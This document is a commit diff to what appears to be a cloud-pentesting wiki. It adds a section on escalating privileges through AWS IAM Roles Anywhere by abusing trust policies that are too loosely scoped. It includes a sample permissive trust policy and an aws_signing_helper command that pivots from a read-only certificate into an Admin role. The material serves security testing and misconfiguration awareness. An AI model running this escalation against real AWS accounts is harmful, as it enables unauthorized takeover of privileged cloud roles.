UPDATE

Author: carlospolop

src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-roles-anywhere-privesc.md

@@ -119,6 +119,50 @@ aws sts assume-role-with-web-identity --role-arn arn:aws:iam::123456789098:role/
 ../aws-basic-information/aws-federation-abuse.md
 {{#endref}}
 
+### IAM Roles Anywhere Privesc
+
+AWS IAM RolesAnywhere allows workloads outside AWS to assume IAM roles using X.509 certificates. But when trust policies aren't properly scoped, they can be abused for privilege escalation.
+
+This policy lacks restrictions on which trust anchor or certificate attributes are allowed. As a result, any certificate tied to any trust anchor in the account can be used to assume this role.
+
+```json
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Principal": {
+        "Service": "rolesanywhere.amazonaws.com"
+      },
+      "Action": [
+        "sts:AssumeRole",
+        "sts:SetSourceIdentity",
+        "sts:TagSession"
+      ]
+    }
+  ]
+}
+
+```
+
+To privesc, the `aws_signing_helper` is required from https://docs.aws.amazon.com/rolesanywhere/latest/userguide/credential-helper.html
+
+Then using a valid certificate the attacker can pivot into the higher privilege role 
+
+```bash
+aws_signing_helper credential-process \
+  --certificate readonly.pem \
+  --private-key readonly.key \
+  --trust-anchor-arn arn:aws:rolesanywhere:us-east-1:123456789012:trust-anchor/ta-id \
+  --profile-arn arn:aws:rolesanywhere:us-east-1:123456789012:profile/default \
+  --role-arn arn:aws:iam::123456789012:role/Admin
+```
+
+
+### References
+
+- [https://www.ruse.tech/blogs/aws-roles-anywhere-privilege-escalation](https://www.ruse.tech/blogs/aws-roles-anywhere-privilege-escalation)
+
 {{#include ../../../banners/hacktricks-training.md}}